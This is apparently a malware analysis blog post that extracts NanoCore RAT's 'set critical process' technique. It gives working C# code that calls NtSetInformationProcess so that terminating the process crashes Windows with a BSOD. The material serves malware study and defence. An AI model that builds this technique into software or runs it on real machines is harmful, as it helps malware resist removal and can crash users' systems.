MalwareAnalysisSeries
This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham
NanoCore 1.2.2.0: Set Critical Process
An interesting TTP that I found during the analysis of NanoCore client binary is that it had an option of making itself as a Critical Process. The reasons for the malware to make itself a critical process could be one of the following:
- Prevent Termination
- Persistent Presence
- Bypass Detection
- System Instability or Sabotage
This TTP gets handle of itself and set it as CRITICAL which would crash the Windows System whenever closed. This is a unique behavior extracted from NanoCore client RAT binary and it lies in multiple MITRE TTPs like Native API and Service Stop, but I think the context here is to use it for defense evasion and masquerading as a critical system process to avoid detecion and stop termination by anti-malware systems.
Elevated permissions are required to execute this TTP.
Implementation
Import APIs
NanoCore can make its process as Critical using the WIN32 Api NtSetInformationProcess.
[DllImport("ntdll.dll")]
public static extern int NtSetInformationProcess(IntPtr processHandle, int processInformationClass, ref int processInformation, int processInformationLength);
Check Elevation
The pre-requisite for achiveing this behavior is to have elevated privileges therefore first step is to validate the privileges.
private static bool CheckElevation()
{
WindowsIdentity identity = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(identity);
bool isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator);
if (isElevated)
return true;
else
return false;
}
Set Critical Process
Following code retrieves the current process handle, enters debug mode, and calls the undocumented NtSetInformationProcess function to change the process’s critical status. If successful, it exits debug mode and returns true; otherwise, it logs the error and returns false. The method ensures that a critical process, if terminated, would cause the system to crash, which is a technique often used by malware for defense evasion, self-preservation or to disrupt the system.
static void Main(string[] args)
{
if (!CheckElevation())
{
//exit
Console.WriteLine("Elevated Privileges Required...!!!");
Environment.Exit(1);
}
if (SetCritical(set_critical_config))
{
Console.WriteLine("Process is Set to Critical");
Console.WriteLine("Do not close the process with Process Name: "+ Process.GetCurrentProcess().ProcessName +" and Process ID: "+ Process.GetCurrentProcess().Id);
Console.WriteLine("OR SYSTEM WILL CRASH");
}
else
{
Console.WriteLine("Failed");
}
// Wait for user input here to examine the process
Console.ReadLine();
}
private static bool SetCritical(bool critical)
{
try
{
IntPtr currentProcessHandle = Process.GetCurrentProcess().Handle;
if (currentProcessHandle != IntPtr.Zero)
{
Process.EnterDebugMode();
int num = critical ? 1 : 0;
int num2 = NtSetInformationProcess(currentProcessHandle, 29, ref num, 4);
if (num2 != 0)
{
//Class8.smethod_86(new Exception(string.Format("Call to NtSetInformationProcess has failed with error code {0:X}", num2)), "UpdateProcessBreakOnTermination");
Console.WriteLine("Call to NtSetInformationProcess has failed with error code {0:X}", num2);
return false;
}
Process.LeaveDebugMode();
return true;
}
else
{
Console.WriteLine("Failed to retrieve handle to the current module.");
return false;
}
}
catch (Exception exception_)
{
//Class8.smethod_86(exception_, "UpdateProcessBreakOnTermination");
Console.WriteLine("UpdateProcessBreakOnTermination: " + exception_);
return false;
}
}
NOTE: After executing the binary, it will wait for user-input and if the process is closed. The system will result in a CRASH with BSOD. Execute at your own RISK!!!
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Disclaimer
Artifacts and code of this repository is intended to be used for educational purposes only!!!